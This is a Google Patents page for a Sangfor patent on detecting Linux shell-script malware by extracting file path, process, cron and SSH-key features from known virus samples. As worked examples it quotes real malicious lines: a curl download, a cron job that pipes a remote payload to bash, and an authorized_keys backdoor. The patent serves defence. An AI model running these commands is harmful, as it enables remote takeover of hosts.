CN111723372B - Virus checking and killing method and device and computer readable storage medium - Google Patents


Info

Publication number
CN111723372B
Authority
CN
China
Prior art keywords
virus
shell script
sample shell
feature
detected
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Active
Application number
CN202010578310.7A
Other languages
Chinese (zh)
Other versions
CN111723372A (en)
Inventor
范楷朋
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Sangfor Technologies Co Ltd
Original Assignee
Sangfor Technologies Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Sangfor Technologies Co Ltd
Priority to CN202010578310.7A
Publication of CN111723372A
Application granted
Publication of CN111723372B
Legal status: Active
Anticipated expiration

Classifications

    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55Detecting local intrusion or implementing counter-measures
    • G06F21/56Computer malware detection or handling, e.g. anti-virus arrangements
    • G06F21/562Static detection
    • G06F21/563Static detection by source code analysis
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55Detecting local intrusion or implementing counter-measures
    • G06F21/56Computer malware detection or handling, e.g. anti-virus arrangements
    • G06F21/568Computer malware detection or handling, e.g. anti-virus arrangements eliminating virus, restoring damaged files
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F2221/00Indexing scheme relating to security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F2221/03Indexing scheme relating to G06F21/50, monitoring users, programs or devices to maintain the integrity of platforms
    • G06F2221/033Test or assess software
    • YGENERAL TAGGING OF NEW TECHNOLOGICAL DEVELOPMENTS; GENERAL TAGGING OF CROSS-SECTIONAL TECHNOLOGIES SPANNING OVER SEVERAL SECTIONS OF THE IPC; TECHNICAL SUBJECTS COVERED BY FORMER USPC CROSS-REFERENCE ART COLLECTIONS [XRACs] AND DIGESTS
    • Y02TECHNOLOGIES OR APPLICATIONS FOR MITIGATION OR ADAPTATION AGAINST CLIMATE CHANGE
    • Y02DCLIMATE CHANGE MITIGATION TECHNOLOGIES IN INFORMATION AND COMMUNICATION TECHNOLOGIES [ICT], I.E. INFORMATION AND COMMUNICATION TECHNOLOGIES AIMING AT THE REDUCTION OF THEIR OWN ENERGY USE
    • Y02D10/00Energy efficient computing, e.g. low power processors, power management or thermal management

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Software Systems (AREA)
  • Computer Hardware Design (AREA)
  • General Engineering & Computer Science (AREA)
  • Theoretical Computer Science (AREA)
  • Virology (AREA)
  • Health & Medical Sciences (AREA)
  • Physics & Mathematics (AREA)
  • General Physics & Mathematics (AREA)
  • General Health & Medical Sciences (AREA)
  • Measuring Or Testing Involving Enzymes Or Micro-Organisms (AREA)
  • Apparatus Associated With Microorganisms And Enzymes (AREA)

Abstract

The invention discloses a virus scanning and removal method, a device and a computer-readable storage medium. The method comprises the following steps: acquiring a set of objects to be detected on a device to be detected; matching the set of objects to be detected against a first feature item set to obtain a first matching result, wherein the first feature item set is generated from sample shell scripts corresponding to known viruses; and when the first matching result is a successful match, confirming that a virus exists on the device to be detected and clearing the virus from the device. Because the set of objects to be detected is matched against a feature item set derived from the virus's own sample shell script, the virus can be found quickly and comprehensively and removed accurately, which addresses the technical problem that a virus is repeatedly re-infected and cannot be thoroughly cleaned out.

Description

Virus checking and killing method and device and computer readable storage medium
Technical Field
The present invention relates to the field of virus killing, and in particular, to a method and apparatus for virus killing, and a computer readable storage medium.
Background
The current industry method for detecting and removing Linux viruses is static file scanning: the ELF files and shell scripts on the system of the device to be detected are scanned for signatures, and if a file is found to be malicious, the file and its process are isolated. However, most Linux viruses are shell scripts, which are heavily obfuscated and therefore hard for a signature engine to detect. Moreover, with the rise of fileless techniques, a virus can persist by other means, so even when the engine removes the virus file the device is often re-infected and the infection cannot be eradicated.
The foregoing is provided merely for the purpose of facilitating understanding of the technical solutions of the present invention and is not intended to represent an admission that the foregoing is prior art.
Disclosure of Invention
The main object of the present invention is to provide a virus scanning and removal method, a virus scanning and removal device and a computer-readable storage medium, in order to solve the technical problem in the prior art that viruses are hard to detect and persist on the host, so that the host is repeatedly re-infected and the virus cannot be removed thoroughly.
In order to achieve the above object, the present invention provides a virus killing method, comprising the steps of:
acquiring a set of objects to be detected in equipment to be detected;
Matching the object set to be detected with a first feature item set to obtain a first matching result, wherein the first feature item set is generated based on a sample shell script corresponding to viruses;
and when the first matching result is that the matching is successful, confirming that viruses exist in the equipment to be detected, and clearing the viruses in the equipment to be detected.
Preferably, the first feature item set includes: virus file path characteristics;
before the collection of objects to be detected in the device to be detected is obtained, the virus killing method further comprises the following steps:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a first code segment with virus file path characteristics from the current sample shell script through a first regular expression;
extracting a first character string positioned behind a first preset identifier from the first code segment;
and obtaining virus file path characteristics based on the first character string, and adding the virus file path characteristics into a first characteristic item set.
Preferably, the obtaining of virus file path features based on the first character string comprises:
judging whether the first character string contains a preset character;
if the first character string contains the preset character, taking the first character string as a virus file path feature;
if the first character string does not contain the preset character, converting the first character string to obtain a converted first character string, and taking the converted first character string as a virus file path feature.
Preferably, the first feature item set includes: virus process name characteristics;
before the collection of objects to be detected in the device to be detected is obtained, the virus killing method further comprises the following steps:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a second code segment with virus process name characteristics from the current sample shell script through a second regular expression;
extracting a second character string positioned behind a second preset mark from the second code segment;
and taking the extracted second character string as a virus process name characteristic, and adding the virus process name characteristic into the first characteristic item set.
Preferably, the first feature item set includes: timing task features;
before the collection of objects to be detected in the device to be detected is obtained, the virus killing method further comprises the following steps:
Traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a third code segment with timing task characteristics from the current sample shell script through a third regular expression;
extracting a third character string positioned between third preset identifiers from the third code segment;
and taking the extracted third character string as a timing task feature, and adding the timing task feature into the first feature item set.
Preferably, the first feature item set includes: network connection tool features;
before the collection of objects to be detected in the device to be detected is obtained, the virus killing method further comprises the following steps:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a fourth code segment with network connection tool characteristics from the current sample shell script through a fourth regular expression;
extracting a fourth character string positioned between fourth preset identifiers from the fourth code segment;
and taking the extracted fourth character string as a network connection tool feature, and adding the network connection tool feature into the first feature item set.
Preferably, the matching of the set of objects to be detected with the first feature item set comprises:
matching the set of objects to be detected against a configuration file, wherein the configuration file comprises the first feature item set and a second feature item set, the first feature item set being generated from the code in the sample shell script that performs the malicious behavior, and the second feature item set being generated from the code in the sample shell script that clears other viruses.
Preferably, the second set of feature items includes: the virus file name feature is used for clearing other viruses;
before the collection of objects to be detected in the device to be detected is obtained, the virus killing method further comprises the following steps:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a fifth code segment with virus file name characteristics for clearing other viruses from the current sample shell script through a fifth regular expression;
extracting a fifth character string positioned after a fifth preset mark from the fifth code segment;
and taking the extracted fifth character string as a virus file name feature for clearing other viruses, and adding the virus file name feature for clearing other viruses into a second feature item set.
Preferably, the second set of feature items includes: the virus process name features are used for eliminating other viruses;
before the collection of objects to be detected in the device to be detected is obtained, the virus killing method further comprises the following steps:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a sixth code segment with virus process name characteristics for clearing other viruses from the current sample shell script through a sixth regular expression;
extracting a sixth character string positioned after a sixth preset identifier from the sixth code segment;
and taking the extracted sixth character string as a virus process name feature for clearing other viruses, and adding the virus process name feature for clearing other viruses into a second feature item set.
Preferably, the second feature item set includes: listening port features;
before the set of objects to be detected on the device to be detected is obtained, the virus killing method further comprises the following steps:
traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
searching, through a seventh regular expression, for a seventh code segment having listening port features in the current sample shell script;
extracting a seventh character string located after a seventh preset identifier from the seventh code segment;
and obtaining a listening port feature based on the seventh character string, and adding the listening port feature to the second feature item set.
Preferably, the obtaining of a listening port feature based on the seventh character string comprises:
judging whether the seventh character string is a preset normal service port;
and if not, taking the seventh character string as a listening port feature.
Preferably, the second set of feature items includes: communication tool features;
before the collection of objects to be detected in the device to be detected is obtained, the virus killing method further comprises the following steps:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching an eighth code segment with communication tool characteristics from the current sample shell script through an eighth regular expression;
and taking the eighth code segment as a communication tool feature, and adding the communication tool feature into a second feature item set.
Preferably, the clearing of the viruses from the device to be detected comprises:
removing, from the set of objects to be detected on the device to be detected, those objects that were successfully matched against the first feature item set.
Preferably, after traversing the sample shell script and taking the traversed sample shell script as the current sample shell script, the method comprises:
judging whether the current sample shell script is in an encrypted state;
and if the judgment result is that the current sample shell script is in the encrypted state, decrypting the current sample shell script.
In addition, in order to achieve the above object, the present invention also provides a virus killing device, including: the system comprises a memory, a processor and a virus killing program stored on the memory and capable of running on the processor, wherein the virus killing program is configured to realize the steps of the virus killing method.
In addition, in order to achieve the above object, the present invention also provides a computer-readable storage medium having stored thereon a virus killing program which, when executed by a processor, implements the steps of the virus killing method as described above.
In the method, the set of objects to be detected is matched against a first feature item set generated from the sample shell script corresponding to the virus, and when the match succeeds the virus is cleared from the device to be detected. The virus can thus be found quickly and comprehensively and removed accurately, which solves the technical problem that the virus is repeatedly re-infected and cannot be cleaned out thoroughly.
Drawings
FIG. 1 is a schematic diagram of a virus killing device in a hardware operating environment according to an embodiment of the present invention;
FIG. 2 is a flowchart of a first embodiment of a virus killing method according to the present invention;
FIG. 3 is a flowchart of a second embodiment of the virus killing method according to the present invention;
FIG. 4 is a flowchart of a third embodiment of a virus killing method according to the present invention;
FIG. 5 is a flowchart of a fourth embodiment of a virus killing method according to the present invention;
FIG. 6 is a flowchart of a fifth embodiment of a virus killing method according to the present invention;
FIG. 7 is a flowchart of a sixth embodiment of a virus killing method according to the present invention;
FIG. 8 is a flowchart of a seventh embodiment of a virus killing method according to the present invention;
FIG. 9 is a flowchart of an eighth embodiment of a virus killing method according to the present invention;
FIG. 10 is a flowchart of a method for virus killing according to a ninth embodiment of the present invention;
FIG. 11 is a flowchart of a tenth embodiment of a virus killing method according to the present invention;
the achievement of the objects, functional features and advantages of the present invention will be further described with reference to the accompanying drawings, in conjunction with the embodiments.
Detailed Description
It should be understood that the specific embodiments described herein are for purposes of illustration only and are not intended to limit the scope of the invention.
As shown in fig. 1, the virus killing apparatus may include: a processor 1001, such as a CPU, a communication bus 1002, a user interface 1003, a network interface 1004, and a memory 1005. The communication bus 1002 is used to enable communication between these components. The user interface 1003 may include a display and an input unit such as a keyboard, and may optionally further include a standard wired interface and a wireless interface. The network interface 1004 may optionally include a standard wired interface and a wireless interface (e.g., a Wi-Fi interface). The memory 1005 may be a high-speed RAM or a non-volatile memory such as a disk; it may also optionally be a storage device separate from the processor 1001.
It will be appreciated by those skilled in the art that the structure shown in fig. 1 is not limiting and may include more or fewer components than shown, or may be combined with certain components, or a different arrangement of components.
As shown in fig. 1, an operating system, a network communication module, a user interface module, and a virus killing program may be included in a memory 1005, which is a type of computer storage medium.
In the virus killing apparatus shown in fig. 1, the network interface 1004 is mainly used for data communication with an external network; the user interface 1003 is mainly used for receiving an input instruction of a user; the virus killing apparatus calls a virus killing program stored in the memory 1005 through the processor 1001, and performs the following operations:
acquiring a set of objects to be detected in equipment to be detected;
matching the object set to be detected with a first feature item set to obtain a first matching result, wherein the first feature item set is generated based on a sample shell script corresponding to viruses;
and when the first matching result is that the matching is successful, confirming that viruses exist in the equipment to be detected, and clearing the viruses in the equipment to be detected.
Further, the first feature item set includes: virus file path characteristics; wherein, before the collection of objects to be detected in the device to be detected is obtained, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a first code segment with virus file path characteristics from the current sample shell script through a first regular expression;
Extracting a first character string positioned behind a first preset identifier from the first code segment;
and obtaining virus file path characteristics based on the first character string, and adding the virus file path characteristics into a first characteristic item set.
Further, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:
judging whether the first character string contains preset characters or not;
if the first character string contains the preset character, taking the first character string as a virus file path characteristic;
if the first character string does not contain the preset character, converting the first character string to obtain a converted first character string, and taking the converted first character string as a virus file path characteristic.
Further, the first feature item set includes: virus process name characteristics; wherein, before the collection of objects to be detected in the device to be detected is obtained, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a second code segment with virus process name characteristics from the current sample shell script through a second regular expression;
Extracting a second character string positioned behind a second preset mark from the second code segment;
and taking the extracted second character string as a virus process name characteristic, and adding the virus process name characteristic into the first characteristic item set.
Further, the first feature item set includes: timing task features; wherein, before the collection of objects to be detected in the device to be detected is obtained, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a third code segment with timing task characteristics from the current sample shell script through a third regular expression;
extracting a third character string positioned between third preset identifiers from the third code segment;
and taking the extracted third character string as a timing task feature, and adding the timing task feature into the first feature item set.
Further, the first feature item set includes: network connection tool features; wherein, before the collection of objects to be detected in the device to be detected is obtained, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:
Traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a fourth code segment with network connection tool characteristics from the current sample shell script through a fourth regular expression;
extracting a fourth character string positioned between fourth preset identifiers from the fourth code segment;
and taking the extracted fourth character string as a network connection tool feature, and adding the network connection tool feature into the first feature item set.
Further, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:
matching the object set to be detected with a configuration file, wherein the configuration file comprises a first characteristic item set and a second characteristic item set, the first characteristic item set is generated by codes for malicious behavior in a sample shell script, and the second characteristic item set is generated by codes for clearing other viruses in the sample shell script.
Further, the second set of feature items includes: the virus file name feature is used for clearing other viruses; wherein, before the collection of objects to be detected in the device to be detected is obtained, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:
Traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a fifth code segment with virus file name characteristics for clearing other viruses from the current sample shell script through a fifth regular expression;
extracting a fifth character string positioned after a fifth preset mark from the fifth code segment;
and taking the extracted fifth character string as a virus file name feature for clearing other viruses, and adding the virus file name feature for clearing other viruses into a second feature item set.
Further, the second set of feature items includes: the virus process name features are used for eliminating other viruses; wherein, before the collection of objects to be detected in the device to be detected is obtained, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching a sixth code segment with virus process name characteristics for clearing other viruses from the current sample shell script through a sixth regular expression;
Extracting a sixth character string positioned after a sixth preset identifier from the sixth code segment;
and taking the extracted sixth character string as a virus process name feature for clearing other viruses, and adding the virus process name feature for clearing other viruses into a second feature item set.
Further, the second feature item set includes: listening port features; wherein, before the set of objects to be detected on the device to be detected is obtained, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:
traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
searching, through a seventh regular expression, for a seventh code segment having listening port features in the current sample shell script;
extracting a seventh character string located after a seventh preset identifier from the seventh code segment;
and obtaining a listening port feature based on the seventh character string, and adding the listening port feature to the second feature item set.
Further, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:
judging whether the seventh character string is a preset normal service port;
and if not, taking the seventh character string as a listening port feature.
Further, the second set of feature items includes: communication tool features; wherein, before the collection of objects to be detected in the device to be detected is obtained, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:
traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
searching an eighth code segment with communication tool characteristics from the current sample shell script through an eighth regular expression;
and taking the eighth code segment as a communication tool feature, and adding the communication tool feature into a second feature item set.
Further, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:
and removing objects successfully matched with the first characteristic item set in the object set to be detected in the equipment to be detected.
Further, after traversing the sample shell script and taking the traversed sample shell script as the current sample shell script, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:
Judging whether the current sample shell script is in an encrypted state or not;
and if the judgment result is that the current sample shell script is in the encrypted state, decrypting the current sample shell script.
In the method, the set of objects to be detected is matched against a first feature item set generated from the sample shell script corresponding to the virus, and when the match succeeds the virus is cleared from the device to be detected. The virus can thus be found quickly and comprehensively and removed accurately, which solves the technical problem that the virus is repeatedly re-infected and cannot be cleaned out thoroughly.
Based on the hardware structure, the embodiment of the virus searching and killing method is provided.
Referring to fig. 2, fig. 2 is a flow chart of a first embodiment of the virus killing method according to the present invention.
In a first embodiment, the virus killing method includes the steps of:
s10: acquiring a set of objects to be detected in equipment to be detected;
It can be understood that the device to be detected is any device on which virus detection, and in particular Linux virus detection, needs to be performed. It may be an electronic device such as a notebook computer, a desktop computer, a tablet computer or a mobile phone; the invention does not limit this, and any device that needs virus detection may serve as the device to be detected in the present application.
The set of objects to be detected may comprise, for example, at least one of the process list and the timing (cron) task list of the device to be detected. In one embodiment, the ps -elf command and the crontab -l command may be used to obtain the process list and the timing task list of the device to be detected, respectively.
S20: matching the object set to be detected with a first feature item set to obtain a first matching result, wherein the first feature item set is generated based on a sample shell script corresponding to viruses;
It should be appreciated that the first feature item set is generated based on the sample shell script corresponding to a virus, and includes at least one of a virus file path feature, a virus process name feature, a timing task feature, and a network connection tool feature. Matching the set of objects to be detected with the first feature item set means matching the objects in the set of objects to be detected with the features in the first feature item set in sequence, and generating a first matching result based on that matching.
The sample shell scripts corresponding to the viruses can be obtained from a history database, that is, the sample shell scripts corresponding to historical viruses are stored in the history database. The history database may hold many sample shell scripts corresponding to viruses, for example 1000 or 2000; the invention does not limit this number, which depends only on how many sample shell scripts have been stored.
S30: and when the first matching result is that the matching is successful, confirming that viruses exist in the equipment to be detected, and clearing the viruses in the equipment to be detected.
It can be understood that when the first matching result is that the matching is successful, it is determined that the virus exists in the device to be detected, and the virus in the device to be detected is removed. In a specific embodiment, the removing the virus in the device to be detected includes removing an object that is successfully matched with the first feature item set in the set of objects to be detected in the device to be detected.
According to the method, the set of objects to be detected is matched with the first feature item set generated based on the sample shell script corresponding to the virus, and when the matching succeeds the virus in the device to be detected is cleared. The method finds viruses quickly and comprehensively, realizes accurate virus searching and killing, and effectively solves the technical problems of viruses being repeatedly infected and not being thoroughly searched and killed.
Further, as shown in fig. 3, a second embodiment of the virus killing method according to the present invention is proposed based on the first embodiment, where in this embodiment, the first feature item set includes: virus file path characteristics;
Wherein, before step S10, the virus killing method further includes:
S101: traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
It can be understood that the sample shell scripts corresponding to the viruses are stored in the history database; when the sample shell scripts in the history database need to be used, they are traversed, and each traversed sample shell script is taken as the current sample shell script. In the following embodiment, the current sample shell script is the one operated on while constructing the first feature item set.
S201: searching a first code segment with virus file path characteristics from the current sample shell script through a first regular expression;
It can be appreciated that after the current sample shell script is obtained, a first code segment is searched for in the current sample shell script through a first regular expression, where a virus file path feature exists in the first code segment. For example, the script downloads the virus file from the attacker's server through a curl or wget command, where the -o parameter specifies the local path the download is saved to; the virus file path feature is therefore extracted by searching for the first code segment containing the curl or wget string and then intercepting the string that follows -o. Specifically, a first code segment containing the curl string can be searched for in the current sample shell script through a first regular expression, and the obtained first code segment is, for example: curl -fsSL http://thyrsi.com/t6/672/1550667479x1822611209.jpg -o /tmp/watchdogs
S301: extracting a first character string positioned behind a first preset identifier from the first code segment;
After the first code segment is obtained based on the first regular expression, a first character string located after the first preset identifier is extracted from the first code segment. Continuing the above embodiment, the obtained first code segment is: curl -fsSL http://thyrsi.com/t6/672/1550667479x1822611209.jpg -o /tmp/watchdogs. Extracting the first character string after the first preset identifier gives /tmp/watchdogs; that is, in this embodiment, the first preset identifier is -o, and the extracted first character string is /tmp/watchdogs.
S401: and obtaining virus file path characteristics based on the first character string, and adding the virus file path characteristics into a first characteristic item set.
It should be appreciated that after the first string is obtained, a virus file path feature is obtained based on the first string, and the virus file path feature is added to a first feature item set to form a portion of the first feature item set.
Further, the deriving virus file path characteristics based on the first string includes,
judging whether the first character string contains preset characters or not;
If the first character string contains the preset character, taking the first character string as a virus file path characteristic;
if the first character string does not contain the preset character, converting the first character string to obtain a converted first character string, and taking the converted first character string as a virus file path characteristic.
It can be understood that after the first character string is obtained, it is first determined whether the first character string contains a preset character, and if it does, the first character string is directly used as the virus file path feature. Continuing with the above embodiment, for example, the preset character is set to /, and the obtained first character string is /tmp/watchdogs. The first character string contains the preset character, so the obtained first character string can be directly used as the virus file path feature.
When the first character string does not include the preset character, converting the obtained first character string, and taking the converted first character string as a virus file path characteristic.
The converted first character string is taken as the path characteristics of the virus file to be specifically divided into two cases:
First case: the first character string does not include $. For example, the obtained first character string is mspi139f; at this time, the cd command that switches the directory needs to be searched for upward in the script, and the directory it switches to is spliced with the first character string to give /tmp/mspi139f, which is used as the virus file path feature.
Second case: the first character string includes $. For example, the first character string is $cron, and the string 'cron=xxx' needs to be searched for upward in the script to obtain cron=/lib64/libgc++.so; at this time, the value /lib64/libgc++.so is used as the virus file path feature.
Further, after step S101, the virus killing method further includes:
judging whether the current sample shell script is in an encrypted state or not;
and if the judgment result is that the current sample shell script is in the encrypted state, decrypting the current sample shell script.
In this embodiment, after a current sample shell script is obtained, whether the current sample shell script is in an encrypted state is first determined, if the determination result indicates that the current sample shell script is in the encrypted state, the current sample shell script is decrypted first, and then a step of determining a code segment from the current sample shell script based on a regular expression is executed; and if the judgment result shows that the current sample shell script is not in an encrypted state, directly executing the step of determining the code segment from the current sample shell script based on the regular expression.
Further, as shown in fig. 4, a third embodiment of the virus killing method according to the present invention is provided based on the first embodiment, where in this embodiment, the first feature item set includes: virus process name characteristics;
Wherein, before step S10, the virus killing method further includes:
S102: traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
It can be understood that the sample shell scripts corresponding to the viruses are stored in the history database; when the sample shell scripts in the history database need to be used, they are traversed, and each traversed sample shell script is taken as the current sample shell script. In the following embodiment, the current sample shell script is the one operated on while constructing the first feature item set.
S202: searching a second code segment with virus process name characteristics from the current sample shell script through a second regular expression;
It can be appreciated that after the current sample shell script is obtained, a second code segment is searched for in the current sample shell script through a second regular expression, where a virus process name feature exists in the second code segment. For example, the nohup command runs a process in the background, and viruses basically start their process in this way, so the corresponding virus process name feature can be obtained by searching for the second code segment containing the nohup character string and then intercepting the second character string that follows the second preset identifier. Specifically, a second code segment containing the nohup character string can be searched for in the current sample shell script through a second regular expression, and the obtained second code segment is, for example: nohup /lib64/launch update.
For another example, to run the virus process, the executable permission (x) must be added to the file, so the corresponding virus process name feature can be obtained by searching for a second code segment containing the chmod +x character string and then intercepting the second character string that follows the second preset identifier. Specifically, a second code segment containing the chmod +x character string can be searched for in the current sample shell script through a second regular expression, and the obtained second code segment is, for example: chmod +x mspi139f.
S302: extracting a second character string positioned behind a second preset mark from the second code segment;
It can be appreciated that, after the second code segment is obtained based on the second regular expression, a second character string located after the second preset identifier is further extracted from the second code segment. Continuing the above embodiment, when the obtained second code segment is nohup /lib64/launch update, extracting the second character string after the second preset identifier gives launch update; that is, in this embodiment, the second preset identifier is the last /, and the extracted second character string is launch update.
When the obtained second code segment is chmod +x mspi139f, extracting the second character string after the second preset identifier gives mspi139f; that is, in this embodiment, the second preset identifier is chmod +x, and the extracted second character string is mspi139f.
S402: and taking the extracted second character string as a virus process name characteristic, and adding the virus process name characteristic into the first characteristic item set.
It should be appreciated that after the second string is obtained, the extracted second string is used as a virus process name feature and the virus process name feature is added to a first feature item set to form a portion of the first feature item set.
Further, as shown in fig. 5, a fourth embodiment of the virus killing method according to the present invention is provided based on the first embodiment, where in this embodiment, the first feature item set includes: timing task features;
wherein, before step S10, the virus killing method further includes:
S103: traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
It can be understood that the sample shell scripts corresponding to the viruses are stored in the history database; when the sample shell scripts in the history database need to be used, they are traversed, and each traversed sample shell script is taken as the current sample shell script. In the following embodiment, the current sample shell script is the one operated on while constructing the first feature item set.
S203: searching a third code segment with timing task characteristics from the current sample shell script through a third regular expression;
It can be appreciated that after the current sample shell script is obtained, a third code segment is searched for in the current sample shell script through a third regular expression, where a timing task feature exists in the third code segment. For example, a third code segment is found through the third regular expression 'echo.+>/var/spool/cron/.+', 'echo.+>/etc/cron.d/.+' or 'echo.+|.+crontab -', and a third character string located between the third preset identifiers is then intercepted to obtain the corresponding timing task feature. Specifically, the third code segment found in the current sample shell script through 'echo.+>/var/spool/cron/.+', 'echo.+>/etc/cron.d/.+' or 'echo.+|.+crontab -' is echo -e "*/1 * * * * root (curl -s http://107.189.11.170/2start.jpg||wget -q -O- http://107.189.11.170/2start.jpg)|bash -sh\n#" >/etc/cron.d/root.
S303: extracting a third character string positioned between third preset identifiers from the third code segment;
It can be appreciated that after the third code segment is obtained based on the third regular expression, a third character string located between the third preset identifiers is further extracted from the third code segment. Continuing the above embodiment, when the obtained third code segment is echo -e "*/1 * * * * root (curl -s http://107.189.11.170/2start.jpg||wget -q -O- http://107.189.11.170/2start.jpg)|bash -sh\n#" >/etc/cron.d/root, extracting the third character string located between the third preset identifiers gives */1 * * * * root (curl -s http://107.189.11.170/2start.jpg||wget -q -O- http://107.189.11.170/2start.jpg)|bash -sh\n#; that is, in this embodiment, the third preset identifier is the double quote ", and the extracted third character string is */1 * * * * root (curl -s http://107.189.11.170/2start.jpg||wget -q -O- http://107.189.11.170/2start.jpg)|bash -sh\n#.
S403: and taking the extracted third character string as a timing task feature, and adding the timing task feature into the first feature item set.
It should be appreciated that after the third string is obtained, the extracted third string is used as a timed task feature and the timed task feature is added to the first set of feature items to form a portion of the first set of feature items.
Further, as shown in fig. 6, a fifth embodiment of the virus killing method according to the present invention is provided based on the first embodiment, where in the present embodiment, the first feature item set includes: network connection tool features;
wherein, before step S10, the virus killing method further includes:
S104: traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;
It can be understood that the sample shell scripts corresponding to the viruses are stored in the history database; when the sample shell scripts in the history database need to be used, they are traversed, and each traversed sample shell script is taken as the current sample shell script. In the following embodiment, the current sample shell script is the one operated on while constructing the first feature item set.
S204: searching a fourth code segment with network connection tool characteristics from the current sample shell script through a fourth regular expression;
It can be appreciated that after the current sample shell script is obtained, a fourth code segment is searched for in the current sample shell script through a fourth regular expression, where a network connection tool feature exists in the fourth code segment. For example, a fourth code segment is found through the fourth regular expression 'echo.+>/root/.ssh/authorized_keys', and a fourth character string located between the fourth preset identifiers is then intercepted to obtain the corresponding network connection tool feature. Specifically, the fourth code segment found in the current sample shell script through 'echo.+>/root/.ssh/authorized_keys' is echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAv54nAGwGwm626zrsUeI0bnVygjgs/ux7v5phk1bZYFHEm+3Aa0gfu5EQyQdnhTp01abaKxWJ97mrM5a2VAfTN+n6KUwNYRZpaDKIUwnHNUSW7E" >/root/.ssh/authorized_keys.
S304: extracting a fourth character string positioned between fourth preset identifiers from the fourth code segment;
It can be appreciated that, after the fourth code segment is obtained based on the fourth regular expression, a fourth character string located between the fourth preset identifiers is further extracted from the fourth code segment. Continuing the above embodiment, when the obtained fourth code segment is echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAv54nAGwGwm626zrsUeI0bnVygjgs/ux7v5phk1bZYFHEm+3Aa0gfu5EQyQdnhTp01abaKxWJ97mrM5a2VAfTN+n6KUwNYRZpaDKIUwnHNUSW7E" >/root/.ssh/authorized_keys, extracting the fourth character string between the fourth preset identifiers gives ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAv54nAGwGwm626zrsUeI0bnVygjgs/ux7v5phk1bZYFHEm+3Aa0gfu5EQyQdnhTp01abaKxWJ97mrM5a2VAfTN+n6KUwNYRZpaDKIUwnHNUSW7E; that is, in this embodiment, the fourth preset identifier is the double quote ", and the extracted fourth character string is ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAv54nAGwGwm626zrsUeI0bnVygjgs/ux7v5phk1bZYFHEm+3Aa0gfu5EQyQdnhTp01abaKxWJ97mrM5a2VAfTN+n6KUwNYRZpaDKIUwnHNUSW7E.
S404: and taking the extracted fourth character string as a network connection tool feature, and adding the network connection tool feature into the first feature item set.
It should be appreciated that after the fourth string is obtained, the extracted fourth string is used as a network connection tool feature and the network connection tool feature is added to the first feature set to form a portion of the first feature set.
Further, as shown in fig. 7, a sixth embodiment of the virus killing method according to the present invention is proposed based on the first embodiment, in which step S20 includes,
S20': matching the set of objects to be detected with a configuration file, wherein the configuration file comprises a first feature item set and a second feature item set, the first feature item set is generated from the code for malicious behaviour in the sample shell script, and the second feature item set is generated from the code for clearing other viruses in the sample shell script.
